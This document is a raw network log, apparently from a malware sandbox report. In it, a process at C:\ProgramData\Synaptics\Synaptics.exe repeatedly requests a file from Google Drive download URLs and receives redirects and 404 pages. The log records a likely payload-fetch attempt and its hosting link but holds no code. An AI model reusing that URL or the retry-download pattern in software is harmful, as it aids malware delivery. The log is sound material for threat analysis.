                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wQQ9xDOQtK9h_I33uXQtrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="vRwH9vjAGkWPeKjK7IahaQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:47 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.9 | 49833 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-VEKuC3aGAMiuEyAMUNbOzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.9 | 49834 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-V-4xVwjuM6-6uZldyXsFCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.9 | 49835 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:48 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4NPnyuPuo627mGVkIHYHNTODlFAUEb9a1x0vu809gsNT5rPkTzvPWJH-n9S1RBkg4RP9lO9ok
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7x1LYiQYv-1TRgfMwOCTQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:48 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:48 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="j9dqMdXu1biGrlhKVsgEOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:48 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.9 | 49838 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:48 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7KLFUzBUDqk6-iriMtdDwqt4tTqbTHSgwjmSN9hg3M_6a2Bpjxw78Yjwoe2JQecEJa
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_AvqLEvdlrtumAnwbtXgcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:48 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:48 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="cq6d7QE-4n8Hd6kUfD4FaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:48 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.9 | 49839 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Pv6w9TWMZmzQz0vKBIEQTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    75 | 192.168.2.9 | 49840 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-szXIE2C91GkqtX8O5zClnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    76 | 192.168.2.9 | 49841 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:48 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:49 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7hUXUoJxNf5JNQ-4WeN5jArb5BtSJwve_aYd7OmhZ7VX_h6lVNyKlmiXdDwPZfpyaG
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z4uXlXGUD4Pg68MgaPc0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:49 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:49 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="kc1yP2pR_zzwK0i7wWXpYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:49 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    77 | 192.168.2.9 | 49842 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:48 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7kasKj1-HIRSNKNTgYCaGRvgq23ksbRw6db3M04rBbzf2GJrm3tDctiSsuxruGToDMJkc1RLk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hRjFIFkDEutSfuuEQOcuiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:49 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:49 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="l3lnPoW6RCgS-oHe0IdxrQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:49 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    78 | 192.168.2.9 | 49847 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:50 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:50 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6akkKnpOigftMaCiywablOKUnwStRRSmcJV54lSz-aMG-1atZn4ObKnWZSSE0nG18mSAf3afE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EdYe7V9LT1smBrek8aYxNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:50 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:50 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="PJy8HMWSeNZTWg__sA0Rwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
